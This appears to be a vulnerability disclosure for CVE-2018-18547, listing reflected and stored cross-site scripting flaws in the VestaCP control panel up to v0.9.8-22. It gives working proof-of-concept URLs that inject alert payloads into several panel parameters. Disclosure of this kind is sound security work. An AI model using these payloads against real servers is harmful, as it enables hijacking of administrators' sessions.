[+] Title: VestaCP Multiple XSS Vulnerabilities <= v0.9.8-22 [+] Author: Numan OZDEMIR (https://infinitumit.com.tr) [+] Vendor Homepage: vestacp.com [+] Version: Up to v0.9.8-22. [+] CVE: CVE-2018-18547 [+] Discovered by Numan OZDEMIR in InfinitumIT Labs [+] root@numanozdemir.com - info@infinitumit.com.tr [~] Description: Insert any XSS payload. I will use https://IP:8083/list/directory/ -> Stored XSS: A visitor may upload a file as named xss payload, using any form in your website. If VestaCP user see this file in the interface, his browser will run the JavaScript. So this vulnerability makes high risk. https://IP:8083/edit/web/?domain=">%3Cimg%20src%20onerror%3Dalert(1337)%3E -> Reflected XSS https://IP:8083/list/backup/?backup=">%3Cimg%20src%20onerror%3Dalert(1337)%3E -> Reflected XSS https://IP:8083/list/rrd/?period=">%3Cimg%20src%20onerror%3Dalert(1337)%3E -> Reflected XSS https://IP:8083/list/directory/?dir_a=">alert(1337);// -> Reflected XSS // for secure days...